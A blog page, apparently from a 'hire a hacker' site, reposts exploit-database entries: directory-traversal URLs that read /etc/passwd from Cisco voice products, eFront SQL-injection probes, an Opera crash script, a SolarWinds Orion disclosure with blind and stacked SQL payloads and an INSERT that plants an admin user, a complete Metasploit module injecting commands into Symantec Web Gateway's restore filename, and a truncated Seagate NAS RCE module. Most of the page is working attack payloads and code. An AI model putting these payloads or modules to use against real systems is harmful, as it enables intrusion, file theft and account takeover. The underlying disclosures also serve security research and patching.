Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863128684

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/50372/info

Multiple Cisco products are prone to a directory-traversal vulnerability.

Exploiting this issue will allow an attacker to read arbitrary files from locations outside of the application's current directory. This could help the attacker launch further attacks.

This issue is tracked by Cisco BugID CSCts44049 and CSCth09343.

The following products are affected:

Cisco Unified IP Interactive Voice Response
Cisco Unified Contact Center Express
Cisco Unified Communications Manager 

http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd

http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../usr/local/platform/conf/platformConfig.xml
HireHackking 
source: https://www.securityfocus.com/bid/50419/info

eFront is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

eFront 3.6.10 is vulnerable; other versions may also be affected. 

http://www.example.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=0--

http://www.example.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=1--
HireHackking 
source: https://www.securityfocus.com/bid/50421/info

The Opera Web Browser is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

Opera Web Browser 11.52 is vulnerable; other versions may also be affected. 

<script>alert(/\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r/); </script>
HireHackking 
I found a couple SQL injection vulnerabilities in the core Orion service
used in most of the Solarwinds products (SAM, IPAM, NPM, NCM, etc…). This
service provides a consistent configuration and authentication layer across
the products.

To be exact, the vulnerable applications and versions are:

Network Performance Monitor -- < 11.5
NetFlow Traffic Analyzer -- < 4.1
Network Configuration Manager -- < 7.3.2
IP Address Manager -- < 4.3
User Device Tracker -- < 3.2
VoIP & Network Quality Manager -- < 4.2
Server & Application Monitor -- < 6.2
Web Performance Monitor -- < 2.2

At first glance, the injections are only available to admins, as the
requests used are on the Manage Accounts page. However, it seems there is
no real ACL check on the GetAccounts and GetAccountGroups endpoints of the
AccountManagement.asmx service, which means that even authenticating as
Guest allows for exploitation. By default, the Guest account has no
password and is enabled.

On both the GetAccounts and GetAccountGroups endpoints, the 'sort' and
'dir' parameters are susceptible to boolean-/time-based, and stacked
injections. By capturing the AJAX requests made by an admin user to these
endpoints, authenticating as Guest and replacing the admin cookie with the
Guest cookie, you can still make a successful request, and thus a
successful exploitation vector for any authenticated user.

Being a stacked injection, this becomes a privilege escalation at the very
least, as an attacker is able to insert their own admin user. A pull
request for a Metasploit module which should achieve this on any product
using the Orion service as the core authentication management system, using
the GetAccounts endpoint, has been made (
https://github.com/rapid7/metasploit-framework/pull/4836). By default, the
module attempts to authenticate as the Guest user with a blank password,
then exploit the SQL injection to insert a new admin with a blank password.

I am not sure if the non-trial versions allow you to specify your own SQL
server, but the trials install a SQL Server Express instance. The SQL user
that the application uses is not an administrator, and the xp_cmd_shell
stored procedure is unavailable.

Within the GetAccounts endpoint:

Parameter: dir (GET)

    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
    Payload: sort=Accounts.AccountID&dir=ASC,(SELECT (CASE WHEN (5791=5791)
THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 5791*(SELECT 5791 FROM
master..sysdatabases) END))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.AccountID&dir=ASC; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.AccountID&dir=ASC WAITFOR DELAY '0:0:5'--


Parameter: sort (GET)

    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter
replace (original value)
    Payload: sort=(SELECT (CASE WHEN (8998=8998) THEN
CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(73)+CHAR(68)
ELSE 8998*(SELECT 8998 FROM master..sysdatabases) END))&dir=ASC

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.AccountID; WAITFOR DELAY '0:0:5'--&dir=ASC

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.AccountID WAITFOR DELAY '0:0:5'--&dir=ASC



Within the GetAccountGroups endpoint, very similar injection techniques are
available:

Parameter: dir (GET)

    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
    Payload: sort=Accounts.GroupPriority&dir=ASC,(SELECT (CASE WHEN
(8799=8799) THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 8799*(SELECT 8799 FROM
master..sysdatabases) END))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.GroupPriority&dir=ASC; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.GroupPriority&dir=ASC WAITFOR DELAY '0:0:5'--


Parameter: sort (GET)

    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter
replace (original value)
    Payload: sort=(SELECT (CASE WHEN (1817=1817) THEN
CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(71)+CHAR(114)+CHAR(111)+CHAR(117)+CHAR(112)+CHAR(80)+CHAR(114)+CHAR(105)+CHAR(111)+CHAR(114)+CHAR(105)+CHAR(116)+CHAR(121)
ELSE 1817*(SELECT 1817 FROM master..sysdatabases) END))&dir=ASC

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.GroupPriority; WAITFOR DELAY '0:0:5'--&dir=ASC

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.GroupPriority WAITFOR DELAY '0:0:5'--&dir=ASC


An example injection to insert an admin user named notadmin with a blank
password using the 'dir' parameter would be:

ASC;insert into accounts values ('notadmin', '127-510823478-74417-8',
'/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==',
'Feb  1 2100 12:00AM', 'Y', 'notadmin', 1, '', '', 1, -1, 8, -1, 4, 0, 0,
0, 0, 0, 0, 'Y', 'Y', 'Y', 'Y', 'Y', '', '', 0, 0, 0, 'N', 'Y', '', 1, '',
0, '');

This vulnerability was reported to Solarwinds on Dec 8th, 2014 and was
assigned the CVE identifier CVE-2014-9566. A coordinated disclosure date of
Feb 24th, 2015 was chosen by both parties. I would like to thank Rob Hock,
Group Product Manager – Network Management at Solarwinds for the easy
coordination (you should still have a bug bounty though!).

i can has crazy cool vuln name, yaes? wat about Polarbends, or Molarfriends?

i dub thee Molarfriends vulnerability. wheres my markketing tem...

-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Symantec Web Gateway 5 restore.php Post Authentication Command Injection",
      'Description'    => %q{
          This module exploits a command injection vulnerability found in Symantec Web
        Gateway's setting restoration feature. The filename portion can be used to inject
        system commands into a syscall function, and gain control under the context of
        HTTP service.

        For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user.
        However, for version 5.2.1, you must be an administrator.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Egidio Romano', # Original discovery & assist of MSF module
          'sinn3r'
        ],
      'References'     =>
        [
          [ 'CVE', '2014-7285' ],
          [ 'OSVDB', '116009' ],
          [ 'BID', '71620' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2014-19' ],
          [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141216_00']
        ],
      'Payload'        =>
        {
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic python'
            }
        },
      'DefaultOptions' => {
        'RPORT'      => 443,
        'SSL'        => true,
        'SSLVersion' => 'TLS1'
      },
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['Symantec Web Gateway 5', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Dec 16 2014", # Symantec security bulletin (Vendor notified on 8/10/2014)
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI to Symantec Web Gateway', '/']),
        OptString.new('USERNAME', [true, 'The username to login as']),
        OptString.new('PASSWORD', [true, 'The password for the username'])
      ], self.class)
  end

  def protocol
    ssl ? 'https' : 'http'
  end

  def check
    uri = target_uri.path
    res = send_request_cgi({'uri' => normalize_uri(uri, 'spywall/login.php')})

    if res && res.body.include?('Symantec Web Gateway')
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def get_sid
    sid = ''

    uri = target_uri.path
    res = send_request_cgi({
      'uri'    => normalize_uri(uri, 'spywall/login.php'),
      'method' => 'GET',
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out while retrieving PHPSESSID')
    end

    cookies = res.get_cookies
    sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''

    sid
  end

  def login(sid)
    uri = target_uri.path
    res = send_request_cgi({
      'uri'    => normalize_uri(uri, 'spywall/login.php'),
      'method' => 'POST',
      'cookie' => sid,
      'headers' => {
        'Referer' => "#{protocol}://#{peer}/#{normalize_uri(uri, 'spywall/login.php')}"
      },
      'vars_post' => {
        'USERNAME' => datastore['USERNAME'],
        'PASSWORD' => datastore['PASSWORD'],
        'loginBtn' => 'Login'
      }
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out while attempting to login')
    end

    cookies = res.get_cookies
    sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''

    if res.headers['Location'] =~ /executive_summary\.php$/ && !sid.blank?
      # Successful login
      return sid
    else
      # Failed login
      fail_with(Failure::NoAccess, "Bad username or password: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
    end
  end

  def build_payload
    # At of today (Feb 27 2015), there are only three payloads this module will support:
    # * cmd/unix/generic
    # * cmd/unix/reverse_python
    # * cmd/unix/reverse_python_ssl
    p = payload.encoded

    case datastore['PAYLOAD']
    when /cmd\/unix\/generic/
      # Filter that one out, Mr. basename()
      p = Rex::Text.encode_base64("import os ; os.system('#{Rex::Text.encode_base64(p)}'.decode('base64'))")
      p = "python -c \"exec('#{p}'.decode('base64'))\""
    else
      p = p.gsub(/python -c "exec/, 'python -c \\"exec')
      p = p.gsub(/decode\('base64'\)\)"/, "decode('base64'))\\\"")
    end

    p
  end

  def build_mime
    p = build_payload

    data = Rex::MIME::Message.new
    data.add_part("#{Time.now.to_i}", nil, nil, 'form-data; name="posttime"')
    data.add_part('maintenance', nil, nil, 'form-data; name="configuration"')
    data.add_part('', 'application/octet-stream', nil, 'form-data; name="licenseFile"; filename=""')
    data.add_part('24', nil, nil, 'form-data; name="raCloseInterval"')
    data.add_part('', nil, nil, 'form-data; name="restore"')
    data.add_part("#{Rex::Text.rand_text_alpha(4)}\n", 'text/plain', nil, "form-data; name=\"restore_file\"; filename=\"#{Rex::Text.rand_text_alpha(4)}.txt; #{p}\"")
    data.add_part('Restore', nil, nil, 'form-data; name="restoreFile"')
    data.add_part('0', nil, nil, 'form-data; name="event_horizon"')
    data.add_part('0', nil, nil, 'form-data; name="max_events"')
    data.add_part(Time.now.strftime("%m/%d/%Y"), nil, nil, 'form-data; name="cleanlogbefore"')
    data.add_part('', nil, nil, 'form-data; name="testaddress"')
    data.add_part('', nil, nil, 'form-data; name="pingaddress"')
    data.add_part('and', nil, nil, 'form-data; name="capture_filter_op"')
    data.add_part('', nil, nil, 'form-data; name="capture_filter"')

    data
  end

  def inject_exec(sid)
    uri = target_uri.path
    mime = build_mime # Payload inside
    send_request_cgi({
      'uri'     => normalize_uri(uri, 'spywall/restore.php'),
      'method'  => 'POST',
      'cookie'  => sid,
      'data'    => mime.to_s,
      'ctype'   => "multipart/form-data; boundary=#{mime.bound}",
      'headers' => {
        'Referer' => "#{protocol}://#{peer}#{normalize_uri(uri, 'spywall/mtceConfig.php')}"
      }
    })
  end

  def save_cred(username, password)
    service_data = {
      address: rhost,
      port: rport,
      service_name: protocol,
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: self.fullname,
      origin_type: :service,
      username: username,
      private_data: password,
      private_type: :password
    }.merge(service_data)

    credential_core = create_credential(credential_data)

    login_data = {
      core: credential_core,
      last_attempted_at: DateTime.now,
      status: Metasploit::Model::Login::Status::SUCCESSFUL
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def exploit
    print_status("Getting the PHPSESSID...")
    sid = get_sid
    if sid.blank?
      print_error("Failed to get the session ID. Cannot continue with the login.")
      return
    end

    print_status("Attempting to log in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
    sid = login(sid)
    if sid.blank?
      print_error("Failed to get the session ID from the login process. Cannot continue with the injection.")
      return
    else
      # Good password, keep it
      save_cred(datastore['USERNAME'], datastore['PASSWORD'])
    end

    print_status("Trying restore.php...")
    inject_exec(sid)
  end

end
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rexml/document'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Seagate Business NAS Unauthenticated Remote Command Execution',
      'Description'    => %q{
        Some Seagate Business NAS devices are vulnerable to command execution via a local
        file include vulnerability hidden in the language parameter of the CodeIgniter
        session cookie. The vulnerability manifests in the way the language files are
        included in the code on the login page, and hence is open to attack from users
        without the need for authentication. The cookie can be easily decrypted using a
        known static encryption key and re-encrypted once the PHP object string has been
        modified.
        This module has been tested on the STBN300 device.
      },
      'Author'         => [
          'OJ Reeves <oj[at]beyondbinary.io>' # Discovery and Metasploit module
        ],
      'References'     => [
          ['CVE', '2014-8684'],
          ['CVE', '2014-8686'],
          ['CVE', '2014-8687'],
          ['EDB', '36202'],
          ['URL', 'http://www.seagate.com/au/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/'],
          ['URL', 'https://beyondbinary.io/advisory/seagate-nas-rce/']
        ],
      'DisclosureDate' => 'Mar 01 2015',
      'Privileged'     => true,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Payload'        => {'DisableNops' => true},
      'Targets'        => [['Automatic', {}]],
      'DefaultTarget'  => 0,
      'License'        => MSF_LICENSE
      ))

    register_options([
        OptString.new('TARGETURI', [true, 'Path to the application root', '/']),
        OptString.new('ADMINACCOUNT', [true, 'Name of the NAS admin account', 'admin']),
        OptString.new('COOKIEID', [true, 'ID of the CodeIgniter session cookie', 'ci_session']),
